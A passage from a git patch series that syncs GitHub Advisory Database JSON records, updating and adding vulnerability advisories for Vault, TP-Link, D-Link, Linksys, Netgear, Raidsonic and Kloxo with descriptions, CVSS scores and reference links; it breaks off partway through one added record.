"Vault and Vault Enterprise’s (“Vault”) login MFA rate limits could be bypassed and TOTP tokens could be reused. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.10.0" + }, + { + "fixed": "1.20.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -22,6 +43,10 @@ { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2025-19-vault-login-mfa-bypass-of-rate-limiting-and-totp-token-reuse/76038" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" } ], "database_specific": { @@ -29,8 +54,8 @@ "CWE-307" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T21:09:08Z", "nvd_published_at": "2025-08-01T18:15:57Z" } } \ No newline at end of file From 3959faecaaac752d57148a3f33555ad00615c7c9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 21:32:55 +0000 Subject: [PATCH 307/323] Advisory Database Sync --- .../GHSA-4fwr-mh5q-hchh.json | 6 +- .../GHSA-rxxw-x8j3-4f4f.json | 2 +- .../GHSA-58ph-89f9-hmcp.json | 2 +- .../GHSA-88hc-82jj-pmhh.json | 6 +- .../GHSA-hx4q-7q28-475p.json | 6 +- .../GHSA-rvj2-pqhh-hgg7.json | 6 +- .../GHSA-v4cc-9587-m82w.json | 6 +- .../GHSA-xw6x-7rww-v34g.json | 6 +- .../GHSA-2cvr-c5hj-x7rm.json | 52 +++++++++++++++++ .../GHSA-5cpf-pp9h-vpgm.json | 48 ++++++++++++++++ .../GHSA-5fhc-hfwc-c254.json | 52 +++++++++++++++++ .../GHSA-6xj5-fx7c-xvcj.json | 56 +++++++++++++++++++ .../GHSA-7jqp-2p5w-9crj.json | 52 +++++++++++++++++ .../GHSA-7v67-qhqf-7xjm.json | 52 +++++++++++++++++ .../GHSA-8w5w-66j4-p452.json | 52 +++++++++++++++++ .../GHSA-97gj-fw67-mjpj.json | 48 ++++++++++++++++ .../GHSA-cvrx-jhp7-38jf.json | 15 +++-- .../GHSA-fmhj-j6r9-5m2p.json | 15 +++-- .../GHSA-gfgm-2frc-x4f5.json | 56 +++++++++++++++++++ .../GHSA-gg53-3xxr-77gw.json | 52 +++++++++++++++++ .../GHSA-gwv8-67p9-8v37.json | 48 ++++++++++++++++ .../GHSA-h72m-m9r4-r78c.json | 48 ++++++++++++++++ .../GHSA-jr9p-69mv-mf2m.json | 52 +++++++++++++++++ .../GHSA-mgp2-v3xv-x9v3.json | 48 ++++++++++++++++ .../GHSA-vv4j-q4m2-9gr7.json | 48 ++++++++++++++++ .../GHSA-w7gc-gxjh-pg78.json | 52 +++++++++++++++++ .../GHSA-xcrc-5423-m358.json | 48 ++++++++++++++++ 27 files changed, 918 insertions(+), 16 deletions(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-2cvr-c5hj-x7rm/GHSA-2cvr-c5hj-x7rm.json create mode 100644 advisories/unreviewed/2025/08/GHSA-5cpf-pp9h-vpgm/GHSA-5cpf-pp9h-vpgm.json create mode 100644 advisories/unreviewed/2025/08/GHSA-5fhc-hfwc-c254/GHSA-5fhc-hfwc-c254.json create mode 100644 advisories/unreviewed/2025/08/GHSA-6xj5-fx7c-xvcj/GHSA-6xj5-fx7c-xvcj.json create mode 100644 advisories/unreviewed/2025/08/GHSA-7jqp-2p5w-9crj/GHSA-7jqp-2p5w-9crj.json create mode 100644 advisories/unreviewed/2025/08/GHSA-7v67-qhqf-7xjm/GHSA-7v67-qhqf-7xjm.json create mode 100644 advisories/unreviewed/2025/08/GHSA-8w5w-66j4-p452/GHSA-8w5w-66j4-p452.json create mode 100644 advisories/unreviewed/2025/08/GHSA-97gj-fw67-mjpj/GHSA-97gj-fw67-mjpj.json create mode 100644 advisories/unreviewed/2025/08/GHSA-gfgm-2frc-x4f5/GHSA-gfgm-2frc-x4f5.json create mode 100644 advisories/unreviewed/2025/08/GHSA-gg53-3xxr-77gw/GHSA-gg53-3xxr-77gw.json create mode 100644 advisories/unreviewed/2025/08/GHSA-gwv8-67p9-8v37/GHSA-gwv8-67p9-8v37.json create mode 100644 advisories/unreviewed/2025/08/GHSA-h72m-m9r4-r78c/GHSA-h72m-m9r4-r78c.json create mode 100644 advisories/unreviewed/2025/08/GHSA-jr9p-69mv-mf2m/GHSA-jr9p-69mv-mf2m.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mgp2-v3xv-x9v3/GHSA-mgp2-v3xv-x9v3.json create mode 100644 advisories/unreviewed/2025/08/GHSA-vv4j-q4m2-9gr7/GHSA-vv4j-q4m2-9gr7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-w7gc-gxjh-pg78/GHSA-w7gc-gxjh-pg78.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xcrc-5423-m358/GHSA-xcrc-5423-m358.json diff --git a/advisories/github-reviewed/2025/02/GHSA-4fwr-mh5q-hchh/GHSA-4fwr-mh5q-hchh.json b/advisories/github-reviewed/2025/02/GHSA-4fwr-mh5q-hchh/GHSA-4fwr-mh5q-hchh.json index b70e99b0d1a83..a01a1db8611df 100644 --- a/advisories/github-reviewed/2025/02/GHSA-4fwr-mh5q-hchh/GHSA-4fwr-mh5q-hchh.json +++ b/advisories/github-reviewed/2025/02/GHSA-4fwr-mh5q-hchh/GHSA-4fwr-mh5q-hchh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4fwr-mh5q-hchh", - "modified": "2025-06-30T15:30:37Z", + "modified": "2025-08-01T21:30:57Z", "published": "2025-02-26T18:30:39Z", "aliases": [ "CVE-2025-1634" @@ -106,6 +106,10 @@ "type": "WEB", "url": "https://github.com/quarkusio/quarkus/commit/80b8eb41678cdccb46e964dc324d048a5ef00f4b" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:12511" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:1884" diff --git a/advisories/unreviewed/2025/05/GHSA-rxxw-x8j3-4f4f/GHSA-rxxw-x8j3-4f4f.json b/advisories/unreviewed/2025/05/GHSA-rxxw-x8j3-4f4f/GHSA-rxxw-x8j3-4f4f.json index 49e78195ec03d..80560efb007f5 100644 --- a/advisories/unreviewed/2025/05/GHSA-rxxw-x8j3-4f4f/GHSA-rxxw-x8j3-4f4f.json +++ b/advisories/unreviewed/2025/05/GHSA-rxxw-x8j3-4f4f/GHSA-rxxw-x8j3-4f4f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rxxw-x8j3-4f4f", - "modified": "2025-05-07T18:30:49Z", + "modified": "2025-08-01T21:31:01Z", "published": "2025-05-07T18:30:49Z", "aliases": [ "CVE-2025-20201" diff --git a/advisories/unreviewed/2025/07/GHSA-58ph-89f9-hmcp/GHSA-58ph-89f9-hmcp.json b/advisories/unreviewed/2025/07/GHSA-58ph-89f9-hmcp/GHSA-58ph-89f9-hmcp.json index cbb1f6e8624b4..bc8473f849164 100644 --- a/advisories/unreviewed/2025/07/GHSA-58ph-89f9-hmcp/GHSA-58ph-89f9-hmcp.json +++ b/advisories/unreviewed/2025/07/GHSA-58ph-89f9-hmcp/GHSA-58ph-89f9-hmcp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-58ph-89f9-hmcp", - "modified": "2025-07-07T18:32:29Z", + "modified": "2025-08-01T21:31:03Z", "published": "2025-07-07T18:32:29Z", "aliases": [ "CVE-2025-20325" diff --git a/advisories/unreviewed/2025/07/GHSA-88hc-82jj-pmhh/GHSA-88hc-82jj-pmhh.json b/advisories/unreviewed/2025/07/GHSA-88hc-82jj-pmhh/GHSA-88hc-82jj-pmhh.json index 4db9a2c0554f0..f11a1cb6a3859 100644 --- a/advisories/unreviewed/2025/07/GHSA-88hc-82jj-pmhh/GHSA-88hc-82jj-pmhh.json +++ b/advisories/unreviewed/2025/07/GHSA-88hc-82jj-pmhh/GHSA-88hc-82jj-pmhh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-88hc-82jj-pmhh", - "modified": "2025-07-29T18:30:36Z", + "modified": "2025-08-01T21:31:05Z", "published": "2025-07-29T18:30:36Z", "aliases": [ "CVE-2025-53715" ], "details": "A vulnerability has been found in TP-Link TL-WR841N V11. The vulnerability exists in the /userRpm/Wan6to4TunnelCfgRpm.htm file due to missing input parameter validation, which may lead to the buffer overflow to cause a crash of the web service and result in a denial-of-service (DoS) condition. The attack may be launched remotely. This vulnerability only affects products that are no longer supported by the maintainer.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-hx4q-7q28-475p/GHSA-hx4q-7q28-475p.json b/advisories/unreviewed/2025/07/GHSA-hx4q-7q28-475p/GHSA-hx4q-7q28-475p.json index 929e7477de0e3..711a4dcff8be5 100644 --- a/advisories/unreviewed/2025/07/GHSA-hx4q-7q28-475p/GHSA-hx4q-7q28-475p.json +++ b/advisories/unreviewed/2025/07/GHSA-hx4q-7q28-475p/GHSA-hx4q-7q28-475p.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hx4q-7q28-475p", - "modified": "2025-07-29T18:30:36Z", + "modified": "2025-08-01T21:31:04Z", "published": "2025-07-29T18:30:36Z", "aliases": [ "CVE-2025-53711" ], "details": "A vulnerability has been found in TP-Link TL-WR841N V11. The vulnerability exists in the /userRpm/WlanNetworkRpm.htm file due to missing input parameter validation, which may lead to the buffer overflow to cause a crash of the web service and result in a denial-of-service (DoS) condition. The attack may be launched remotely. This vulnerability only affects products that are no longer supported by the maintainer.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-rvj2-pqhh-hgg7/GHSA-rvj2-pqhh-hgg7.json b/advisories/unreviewed/2025/07/GHSA-rvj2-pqhh-hgg7/GHSA-rvj2-pqhh-hgg7.json index 486e2e46ca291..7e01864615ed9 100644 --- a/advisories/unreviewed/2025/07/GHSA-rvj2-pqhh-hgg7/GHSA-rvj2-pqhh-hgg7.json +++ b/advisories/unreviewed/2025/07/GHSA-rvj2-pqhh-hgg7/GHSA-rvj2-pqhh-hgg7.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rvj2-pqhh-hgg7", - "modified": "2025-07-29T18:30:36Z", + "modified": "2025-08-01T21:31:05Z", "published": "2025-07-29T18:30:36Z", "aliases": [ "CVE-2025-53713" ], "details": "A vulnerability has been found in TP-Link TL-WR841N V11. The vulnerability exists in the /userRpm/WlanNetworkRpm_APC.htm file due to missing input parameter validation, which may lead to the buffer overflow to cause a crash of the web service and result in a denial-of-service (DoS) condition. The attack may be launched remotely. This vulnerability only affects products that are no longer supported by the maintainer.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-v4cc-9587-m82w/GHSA-v4cc-9587-m82w.json b/advisories/unreviewed/2025/07/GHSA-v4cc-9587-m82w/GHSA-v4cc-9587-m82w.json index 390ebb5065b74..1def649d070b3 100644 --- a/advisories/unreviewed/2025/07/GHSA-v4cc-9587-m82w/GHSA-v4cc-9587-m82w.json +++ b/advisories/unreviewed/2025/07/GHSA-v4cc-9587-m82w/GHSA-v4cc-9587-m82w.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v4cc-9587-m82w", - "modified": "2025-07-29T18:30:36Z", + "modified": "2025-08-01T21:31:05Z", "published": "2025-07-29T18:30:36Z", "aliases": [ "CVE-2025-53714" ], "details": "A vulnerability has been found in TP-Link TL-WR841N V11. The vulnerability exists in the /userRpm/WzdWlanSiteSurveyRpm_AP.htm file due to missing input parameter validation, which may lead to the buffer overflow to cause a crash of the web service and result in a denial-of-service (DoS) condition. The attack may be launched remotely. This vulnerability only affects products that are no longer supported by the maintainer.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-xw6x-7rww-v34g/GHSA-xw6x-7rww-v34g.json b/advisories/unreviewed/2025/07/GHSA-xw6x-7rww-v34g/GHSA-xw6x-7rww-v34g.json index 50df3c065dac7..709178c5e59e0 100644 --- a/advisories/unreviewed/2025/07/GHSA-xw6x-7rww-v34g/GHSA-xw6x-7rww-v34g.json +++ b/advisories/unreviewed/2025/07/GHSA-xw6x-7rww-v34g/GHSA-xw6x-7rww-v34g.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xw6x-7rww-v34g", - "modified": "2025-07-29T18:30:36Z", + "modified": "2025-08-01T21:31:04Z", "published": "2025-07-29T18:30:36Z", "aliases": [ "CVE-2025-53712" ], "details": "A vulnerability has been found in TP-Link TL-WR841N V11. The vulnerability exists in the /userRpm/WlanNetworkRpm_AP.htm file due to missing input parameter validation, which may lead to the buffer overflow to cause a crash of the web service and result in a denial-of-service (DoS) condition. The attack may be launched remotely. This vulnerability only affects products that are no longer supported by the maintainer.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/08/GHSA-2cvr-c5hj-x7rm/GHSA-2cvr-c5hj-x7rm.json b/advisories/unreviewed/2025/08/GHSA-2cvr-c5hj-x7rm/GHSA-2cvr-c5hj-x7rm.json new file mode 100644 index 0000000000000..5f3be87629239 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-2cvr-c5hj-x7rm/GHSA-2cvr-c5hj-x7rm.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cvr-c5hj-x7rm", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10050" + ], + "details": "An OS command injection vulnerability exists in multiple D-Link routers—confirmed on DIR-300 rev A (v1.05) and DIR-615 rev D (v4.13)—via the authenticated tools_vct.xgi CGI endpoint. The web interface fails to properly sanitize user-supplied input in the pingIp parameter, allowing attackers with valid credentials to inject arbitrary shell commands. Exploitation enables full device compromise, including spawning a telnet daemon and establishing a root shell. The vulnerability is present in firmware versions that expose tools_vct.xgi and use the Mathopd/1.5p6 web server. No vendor patch is available, and affected models are end-of-life.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10050" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140830203110/http://www.s3cur1ty.de/m1adv2013-014" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/25024" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/27428" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/d-link-legacy-unauth-rce-2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-5cpf-pp9h-vpgm/GHSA-5cpf-pp9h-vpgm.json b/advisories/unreviewed/2025/08/GHSA-5cpf-pp9h-vpgm/GHSA-5cpf-pp9h-vpgm.json new file mode 100644 index 0000000000000..9e31101c23e7e --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-5cpf-pp9h-vpgm/GHSA-5cpf-pp9h-vpgm.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5cpf-pp9h-vpgm", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10062" + ], + "details": "A directory traversal vulnerability exists in Linksys router's web interface (tested on the E1500 model firmware versions 1.0.00, 1.0.04, and 1.0.05), specifically in the /apply.cgi endpoint. Authenticated attackers can exploit the next_page POST parameter to access arbitrary files outside the intended web root by injecting traversal sequences. This allows exposure of sensitive system files and configuration data.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10062" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150428184015/http://www.s3cur1ty.de/m1adv2013-004" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24475" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/linksys-legacy-routers-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-5fhc-hfwc-c254/GHSA-5fhc-hfwc-c254.json b/advisories/unreviewed/2025/08/GHSA-5fhc-hfwc-c254/GHSA-5fhc-hfwc-c254.json new file mode 100644 index 0000000000000..a002743d28185 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-5fhc-hfwc-c254/GHSA-5fhc-hfwc-c254.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fhc-hfwc-c254", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10060" + ], + "details": "An authenticated OS command injection vulnerability exists in Netgear routers (tested on the DGN2200B model) firmware versions 1.0.0.36 and prior via the pppoe.cgi endpoint. A remote attacker with valid credentials can execute arbitrary commands via crafted input to the pppoe_username parameter. This flaw allows full compromise of the device and may persist across reboots unless configuration is restored.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10060" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20170422033239/http://www.s3cur1ty.de/m1adv2013-015" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24513" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24974" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/netgear-legacy-routers-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-6xj5-fx7c-xvcj/GHSA-6xj5-fx7c-xvcj.json b/advisories/unreviewed/2025/08/GHSA-6xj5-fx7c-xvcj/GHSA-6xj5-fx7c-xvcj.json new file mode 100644 index 0000000000000..4f8cc5ab5de85 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-6xj5-fx7c-xvcj/GHSA-6xj5-fx7c-xvcj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xj5-fx7c-xvcj", + "modified": "2025-08-01T21:31:06Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2012-10022" + ], + "details": "Kloxo versions 6.1.12 and earlier contain two setuid root binaries—lxsuexec and lxrestart—that allow local privilege escalation from uid 48. The lxsuexec binary performs a uid check and permits execution of arbitrary commands as root if the invoking user matches uid 48. This flaw enables attackers with Apache-level access to escalate privileges to root without authentication.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-10022" + }, + { + "type": "WEB", + "url": "https://github.com/KloxoNGCommunity/kloxo" + }, + { + "type": "WEB", + "url": "https://kloxo.org" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/kloxo_lxsuexec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121122063935/http://roothackers.net/showthread.php?tid=92" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/25406" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/kloxo-local-priv-esc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-7jqp-2p5w-9crj/GHSA-7jqp-2p5w-9crj.json b/advisories/unreviewed/2025/08/GHSA-7jqp-2p5w-9crj/GHSA-7jqp-2p5w-9crj.json new file mode 100644 index 0000000000000..649915023c216 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7jqp-2p5w-9crj/GHSA-7jqp-2p5w-9crj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jqp-2p5w-9crj", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10059" + ], + "details": "An authenticated OS command injection vulnerability exists in various D-Link routers (tested on DIR-615H1 running firmware version 8.04) via the tools_vct.htm endpoint. The web interface fails to sanitize input passed from the ping_ipaddr parameter to the tools_vct.htm diagnostic interface, allowing attackers to inject arbitrary shell commands using backtick encapsulation. With default credentials, an attacker can exploit this blind injection vector to execute arbitrary commands.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10059" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/dlink_dir615_up_exec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150921102603/http://www.s3cur1ty.de/m1adv2013-008" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24477" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/25609" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/d-link-legacy-os-command-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-7v67-qhqf-7xjm/GHSA-7v67-qhqf-7xjm.json b/advisories/unreviewed/2025/08/GHSA-7v67-qhqf-7xjm/GHSA-7v67-qhqf-7xjm.json new file mode 100644 index 0000000000000..e46d158f6d44d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7v67-qhqf-7xjm/GHSA-7v67-qhqf-7xjm.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7v67-qhqf-7xjm", + "modified": "2025-08-01T21:31:06Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2013-10049" + ], + "details": "An OS command injection vulnerability exists in multiple Raidsonic NAS devices—specifically tested on IB-NAS5220 and IB-NAS4220—via the unauthenticated timeHandler.cgi endpoint exposed through the web interface. The CGI script fails to properly sanitize user-supplied input in the timeZone parameter of a POST request, allowing remote attackers to inject arbitrary shell commands.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10049" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20160616174425/http://www.s3cur1ty.de/m1adv2013-010" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24499" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/28508" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/raidsonic-nas-devices-unauth-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8w5w-66j4-p452/GHSA-8w5w-66j4-p452.json b/advisories/unreviewed/2025/08/GHSA-8w5w-66j4-p452/GHSA-8w5w-66j4-p452.json new file mode 100644 index 0000000000000..97e6b9ef8d574 --- /dev/null +++ 